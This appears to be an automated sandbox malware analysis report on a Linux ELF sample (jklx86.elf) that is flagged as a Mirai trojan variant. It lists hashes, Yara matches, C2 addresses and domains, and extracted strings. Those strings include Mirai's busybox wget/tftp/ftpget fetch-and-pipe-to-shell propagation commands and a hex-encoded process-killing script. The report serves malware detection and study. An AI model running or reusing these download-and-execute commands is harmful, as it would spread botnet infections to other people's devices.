Linux Analysis Report
jklx86.elf

Overview

General Information

Sample name: jklx86.elf
Analysis ID: 1543112
MD5: 0da563b12c633877fab4b7bdb96d59cb
SHA1: b1fd6bdde4d86363a5b3f7d4656f5a295c729a4c
SHA256: 1e9b6766855b0b8845f911d33012106e0fcde7f0200f46769cb1dc545b25a350
Tags: elf user-abuse_ch

Detection

Score: 68
Range: 0 - 100
Whitelisted: false

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
Sends malformed DNS queries
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Yara signature match

Classification

AV Detection

Source: jklx86.elf ReversingLabs: Detection: 57%
Source: jklx86.elf Joe Sandbox ML: detected
Source: jklx86.elf String: /bin/busyboxincorrectinvalidbadwrongfaildeniederrorretryenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> >sh .k/bin/busybox wget http:///curl.sh -o- | shGET /dlr. HTTP/1.0
Source: jklx86.elf String: .dThe People's/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/armarm5arm6arm7mipsmpslppcspcsh4/wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"

Networking

Source: global traffic TCP traffic: 45.156.86.24 ports 38241,1,2,3,4,8
Source: global traffic TCP traffic: 185.150.24.67 ports 38241,1,2,3,4,8
Source: global traffic DNS traffic detected: malformed DNS query: chinklabs.dyn. [malformed]
Source: global traffic DNS traffic detected: malformed DNS query: netfags.geek. [malformed]
Source: global traffic TCP traffic: 192.168.2.15:36274 -> 185.150.24.67:38241
Source: global traffic TCP traffic: 192.168.2.15:56950 -> 45.156.86.24:38241
Source: unknown TCP traffic detected without corresponding DNS query
Source: global traffic DNS traffic detected: DNS query: chinklabs.dyn
Source: global traffic DNS traffic detected: DNS query: yellowchink.pirate
Source: global traffic DNS traffic detected: DNS query: chinklabs.dyn. [malformed]
Source: global traffic DNS traffic detected: DNS query: netfags.geek. [malformed]
Source: jklx86.elf String found in binary or memory: http:///curl.sh

System Summary

Source: jklx86.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: jklx86.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: jklx86.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: jklx86.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 5774.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 5774.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 5774.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 5774.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 5772.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 5772.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 5772.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 5772.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: Initial sample String containing 'busybox' found: /bin/busybox
Source: Initial sample String containing 'busybox' found: usage: busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox hostname PBOC
Source: Initial sample String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample String containing 'busybox' found: /bin/busybox wget http://
Source: Initial sample String containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
Source: Initial sample String containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
Source: Initial sample String containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
Source: ELF static info symbol of initial sample .symtab present: no
Source: jklx86.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: jklx86.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: jklx86.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: jklx86.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: classification engine Classification label: mal68.troj.linELF@0/0@4/0
Source: /tmp/jklx86.elf (PID: 5774) File opened: /proc/<PID>/status (one entry per enumerated process)